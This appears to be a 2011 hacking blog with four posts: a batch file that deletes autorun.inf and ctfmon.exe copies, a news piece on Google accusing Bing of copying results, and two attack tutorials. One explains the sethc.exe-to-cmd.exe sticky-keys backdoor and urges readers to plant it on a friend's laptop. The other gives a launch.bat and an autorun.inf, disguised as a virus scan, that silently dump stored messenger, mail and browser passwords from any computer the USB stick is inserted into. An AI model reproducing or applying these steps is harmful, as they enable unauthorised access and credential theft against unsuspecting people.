Saturday 23 April 2011

How to remove autorun.inf virus from drives using notepad

Remove autorun.inf virus from drives using notepad 
            Most of the people have autorun issues with their flash/hard drives
        it is because of the modification of the autorun.inf file in the root directory which is in most cases hidden and cant be seen
           so you just have to create a bat file with the following syntax as mentioned below
Copy and paste this into Notepad and save it as antivirus.bat or whatever.bat (any name u like)


tskill ctfmon

attrib -s -h -r c:\autorun.inf
attrib -s -h -r D:\autorun.inf
attrib -s -h -r E:\autorun.inf
attrib -s -h -r F:\autorun.inf
attrib -s -h -r G:\autorun.inf
attrib -s -h -r H:\autorun.inf
attrib -s -h -r I:\autorun.inf
attrib -s -h -r J:\autorun.inf

del c:\autorun.inf
del d:\autorun.inf
del e:\autorun.inf
del f:\autorun.inf
del g:\autorun.inf
del h:\autorun.inf
del I:\autorun.inf
del J:\autorun.inf

attrib -s -h -r c:\Recycled\ctfmon.exe
attrib -s -h -r D:\Recycled\ctfmon.exe
attrib -s -h -r E:\Recycled\ctfmon.exe
attrib -s -h -r F:\Recycled\ctfmon.exe
attrib -s -h -r G:\Recycled\ctfmon.exe
attrib -s -h -r H:\Recycled\ctfmon.exe
attrib -s -h -r I:\Recycled\ctfmon.exe
attrib -s -h -r J:\Recycled\ctfmon.exe

del c:\Recycled\ctfmon.exe
del D:\Recycled\ctfmon.exe
del E:\Recycled\ctfmon.exe
del F:\Recycled\ctfmon.exe
del G:\Recycled\ctfmon.exe
del H:\Recycled\ctfmon.exe
del I:\Recycled\ctfmon.exe
del J:\Recycled\ctfmon.exe

attrib -s -h -r "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ctfmon.exe"
del "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ctfmon.exe"

tskill explorer
explorer
pause
 
 
 
 
 
 ENJOY THE TRICKS............!!!!!!!

Sunday 17 April 2011

Search wars: Google accuses Microsoft of search result theft




While Google’s own search neutrality has been under question for a while, no-one has accused them of taking the easy way out (of anything). Now, after the rather incontrovertible evidence that Google’s sting operation has uncovered about Bing’s search practices, we are hard-pressed to think Microsoft is doing otherwise.
The search for evidence of “search result theft” began in December, 2010, months after Google first noticed some suspicious behaviour with Bing’s results in May of 2010. The search team realized Microsoft's Bing was picking up Google's results when it showed a top-ranked result for an obscure query that was identical to Google's. While Google’s search auto-suggested the corrected search query “tarsorrhaphy” for the commonly misspelled query ‘tarsoraphy’, Microsoft’s Bing showed the corrected result as the top ranked one, without any query correction evident in its other results.

Caught in the act

Tarsorrhaphy on Google
 
delhipublicschool40 chdjob on Google

Tarsorrhaphy on Bing

delhipublicschool40 chdjob on Bing
The Bing Sting operation quite literally planted search-candy Google calls “honeypot” for Bing’s snooping eyes, and then caught them staring. Google manually assigned results to obscure or near-random search queries that didn’t previously offer results, and then asked a bunch of its engineers to search for these unique queries using Internet Explorer 8 with the Bing Toolbar installed. And lo, Bing displayed the same search results for the same queries.
After SearchEngineLand’s Danny Sullivan revealed the findings of Google’s ‘Bing Sting’ operation – detailed with screenshots – Microsoft’s Stefan Weitz, the director of Bing, issued the following statement to those who asked:
"We use multiple signals and approaches in ranking search results. The overarching goal is to do a better job determining the intent of the search so we can provide the most relevant answer to a given query. Opt-in programs like the toolbar help us with clickstream data, one of many input signals we and other search engines use to help rank sites."
ZDNet wanted to know more, and Microsoft obliged them with a dismissive retort:
"We do not copy Google's results."
This denial might have been exactly what Google was waiting for before officially stepping in to the fray, for a short while later, Google’s foremost search doctors, Amit Singhal, posted this evidence on Google’s Official Blog, in a post that was unblinkingly titled: “Microsoft’s Bing uses Google search results—and denies it”. The post directly accused Microsoft of snooping into Google’s search results, using “some combination” of IE8 and Bing Toolbar, or “possibly some other means” to take Google search results from users’ computers.
Microsoft’s Harry Schrum questioned the timing of this entire affair on the Bing blog, finding it conspicuously preceding the Farsight Summit for search quality. His lengthy blog post defended Bing’s search practices in a similar manner to Stefan Weitz reply, claiming Bing uses “over 1,000 different signals and features in our ranking algorithm. A small piece of that is clickstream data we get from some of our customers, who opt-in to sharing anonymous data as they navigate the web in order to help us improve the experience for all users.”

Schrum went on to call the Bing Sting a “spy-novelesque stunt” that only generated “extreme outliers in tail query ranking”, referring to the creation of honeypot search results for result-less search queries.
So, “opt-in programs” like the Bing toolbar help Microsoft to “learn from [their] collective customers”, and Schrum’s advice elaborates “we all should.” It’s for perhaps this reason he found the entire Bing Sting a “back-handed compliment”, probably referring to Bing’s efficacy of picking up Google’s search results, oops, anonymous user data.
Google’s stance on the issue remains lofty however, with no compliments in sight, calling Bing “a cheap imitation” of Google, and asking “for this practice to stop.”


“We look forward to competing with genuinely new search algorithms out there—algorithms built on core innovation, and not on recycled search results from a competitor.”

Tuesday 12 April 2011

" How To Hack Windows 7 Password "


                      This is step by step tutorial that explains how to hack windows password setting backdoor. You probably know that you can change windows password via command prompt (cmd) without knowing old password.


Only problem is access to command prompt without logging in. If you press five times shift key you’ll get a dialog box “sticky keys” on screen, this is the only feature which can be used before logging in at logon screen.




So , we’ll replace stick keys (sethc.exe) with cmd.exe , when we press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.


1) Go to C:/Windows/System32 and file .exe file called Sethc







2)Try to delete or move (cut/paste ) to other folder, it isn’t important which one just move it from System32 folder. You’ll get pop up box as below





3)You can’t change system32 directory files until you do not have the permissions, we’ll need take ownership, change permissions , right click on Sethc.exe and clikc Run as Administrator



4)Right click on sethc.exe and click on Properties



5)Go to Security tab and click on Advanced





6)Go to owner tab and click edit





7)Change the owner from “trusted installer” to “administrator” and click apply.










8)Return to Security tab and click on Edit , select administrator and give it full control and apply changes





9)Go to start, in search box type cmd and copy/ paste cmd .exe to desktop





10)Rename cmd to sethc






11)Now replace the orignal sethc.exe with our sethc.exe (cmd). Try to press five times shift key, it should appear command prompt window .


Windows Xp users just need to replace the orignal sethc.exe with our sethc.exe , don’t need to set permissions (step 4-8).

To change windows password via command prompt use following command

Syntax : net user account.name *

Example: net user ivan *




Whenever you would get friend’s laptop set up backdoor and you’ll always be able to hack windows password.

Friday 1 April 2011

How To Hack Passwords Using USB

This tutorial explains how to hack passwords using usb flash drive . I’ve create one win rar file that contains all what you need to hack passwords using usb, it contains MessenPass,PasswordFox,Protected Passview,IE Passview,Mail passview, launch.bat , autorun.inf
MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:MSN Messenger, Windows Messenger (In Windows XP) , Windows Live Messenger (In Windows XP/Vista/7) , Yahoo Messenger (Versions 5.x and 6.x), Google Talk, ICQ Lite 4.x/5.x/2003, AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro., Trillian, Trillian Astra, Miranda, GAIM/Pidgin, MySpace IM, PaltalkScene, Digsby
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.
Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.
IE PassView is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don’t need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 8.0.
Mail PassView is a small password-recovery tool that reveals the passwords and other account details for email clients.
Launch .bat is batch script that runs all programs that I mention above .

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
autorun.inf will run launch.bat after inserting the usb.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
To hack passwords using usb follow steps below

Step 1

Download hackspc.com rar file that contains all Utilities and batch script you need , LINK

Step 2

Extract files from hackspc.com rar to usb , insert usb in computer that you want to hack , autorun window will pop-up , and password recovery tools will silently get executed and get stored in the .TXT files.


 
Related Posts Plugin for WordPress, Blogger...
x

Get Our Latest Posts Via Email - It's Free

Enter your email address:

Delivered by FeedBurner